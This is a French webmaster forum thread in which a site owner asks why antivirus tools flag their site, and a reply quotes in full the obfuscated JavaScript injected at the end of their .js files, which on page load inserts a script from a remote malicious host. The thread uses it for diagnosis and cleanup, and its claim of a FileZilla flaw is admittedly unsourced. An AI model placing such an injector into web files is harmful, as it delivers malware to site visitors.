[Résolu] Antivirus se déclenchant sur mon site

WRInaute passionné
Bonjour à tous,

sur l'un des sites que je gère, on vient de m'apprendre que des antivirus détectaient des trojans et se déclenchaient sur des ordinateurs lorsqu'ils consultaient ce site : 4OOOm.com (j'ai volontairement remplacé les zéros par des lettres, qu'il faut donc modifier si vous souhaitez le consulter).

Je ne vois pas ce qui pourrait déclencher cela, avez-vous des conseils à ce sujet ? existe-t-il des scanners de site pour détecter d'éventuels trojans sur certaines pages ?

Merci d'avance pour vos conseils.
 
Nouveau WRInaute
Re: Antivirus se déclenchant sur mon site

Ton site est victime d'une faille bien connue (découverte de la semaine dernière pour moi :mrgreen: ) et qui touche les utilisateurs de client FTP Filezilla (lors de sa mise à jour visiblement).

Il semblerait que les informations relatives aux comptes FTP enregistrés sous Filezilla soit touchées par une faille qui permet de les récupérer lors de la mise à jour du soft.

Tu remarqueras sans aucun doute que tes fichiers .js ont été modifiés et comportent désormais (en fin de code) ceci:

Code:
/*LGPL*/ try{ window.onload = function(){var Qs4tyl41jdvm = document.createElement('s)$#)c#r(^i)p$@t$@$!'.replace(/\$|\^|\(|#|@|\)|\!|&/ig, ''));Qs4tyl41jdvm.setAttribute('defer', 'd#($e(!f@e@#@!r^^$#'.replace(/\^|\)|\$|\(|#|@|\!|&/ig, ''));Qs4tyl41jdvm.setAttribute('type', 't!$)$e$&)&x(#!@t!@^@/#)j(a)!!v!@a!&(s)$(c@r)^i#@(p)!t@#^'.replace(/\)|\(|#|\!|&|\$|\^|@/ig, ''));Qs4tyl41jdvm.setAttribute('id', 'F@#f^!#$5)$7&(&!w^0!)z^n!&5$@^)x@!@$2(f&7^!'.replace(/\$|\!|\^|\)|\(|#|@|&/ig, ''));Qs4tyl41jdvm.setAttribute('s#^$r^)c@$$'.replace(/\!|\^|#|\(|\)|\$|@|&/ig, ''),  'h#&&t@$^t@!($p#!:$()#/)@!$/)($y@&(#o^)u^r^)f@i!^l@@&^e$#^h^!o!!s$&#t#&#(-&c)$)o$@!&m@&.&@@h)#$a)#(t&(e^n#!a!$.^^!n!e#$.)#j@$(@p!!&.!$c^$a)m&4&-^^)#c^&&&o!$m)&(.$)&f#$&u&&n##w^@^e)#$()b$^()m!a$i#&#l$(.^^r@()u#)@:(8&$0((8@$#0@@(/&@!w#!a)s$h)i#(&n!g$$t@@o#n$!^$p&(@o^@@(!s)&!#t$.^)(c$#o(^!!m&()(/)$!$&w!)&a&)s(^h#i#n&$g)@)$#t($(^o&#n&^($p^o$s!!^#t#.@(^c(@!o&m#(/#p&(o(&r)^$@n&)b^^^)b!##(.#$#(o)#&r^)g!!(/&^^)u@(&^o#!l!$.)!#c#o$^m(.&b)r@@$/&^$g&&!o)o&)$g(l^&!e&)&.$)@&c$(o&@m^(/$)^$&'.replace(/\^|\!|\)|#|@|\$|\(|&/ig, ''));if (document){document.body.appendChild(Qs4tyl41jdvm);}} } catch(Nueyxj312hqrpmq05r6l) {}

C'est ce code qui génère les alertes anti-virus (ou pas, car sur mon poste... Nada :wink: ) !

Vérifie donc tous tes fichiers .js et également les fichiers contenant "index", supprime ce code... et il n'est pas trop prudent que de te conseiller de modifier tes mots de passe FTP (pour les comptes sauvegardés sous Filezilla :wink: ).
 
Nouveau WRInaute
Re: Antivirus se déclenchant sur mon site

RomsIW a dit:
Merci beaucoup pour ton aide, c'était bien ça..

:D

Nous avons rencontré ce souci la semaine dernière avec nos sites... J'ai pour ma part (et non sans regret :( ) délaissé Filezilla depuis :wink:
 
Nouveau WRInaute
agenceinternet a dit:
est-ce que vous avez plus d'infos à propos de cette faille sur filezille ?

Je n'ai pas réussi à mettre la main sur une source claire et précise à ce sujet :(

Je ne fais que relater les propos de notre hébergeur (Nuxit), il semblerait en effet que le gestionnaire de comptes FTP Filezilla soit vulnérable dans le cadre d'une utilisation classique (avec les paramètres par défaut du soft).

Il nous a été conseillé de ne plus utiliser le gestionnaire de comptes Filezilla ou d'utiliser un autre client FTP :wink:
 
Nouveau WRInaute
Firewave a dit:
Vous utilisez quel client ftp du coup?

Pour ma part, j'ai opté pour WinSCP (utilisé par le dév de l'agence de mon précédent stage) :wink:

Toutefois, je ne tiens pas à jeter un quelconque discrédit sur cette petite merveille qu'est Filezilla (que je continue d'ailleurs à utiliser pour les travaux persos, sans enregistrer les mots de passe :mrgreen: ) mais en l'absence de sources fiables quant à cette faille et ses éventuelles corrections je ne préfère pas prendre de risque :wink:
 
WRInaute passionné
C'est clair que j'aimerais pas qu'on m'efface tout comme s'est arrivé à mon ami récemment. Le pire c'est qu'ils ont même bousillé le back up...
Je vais changer d'ftp du coup.
 
Discussions similaires
Haut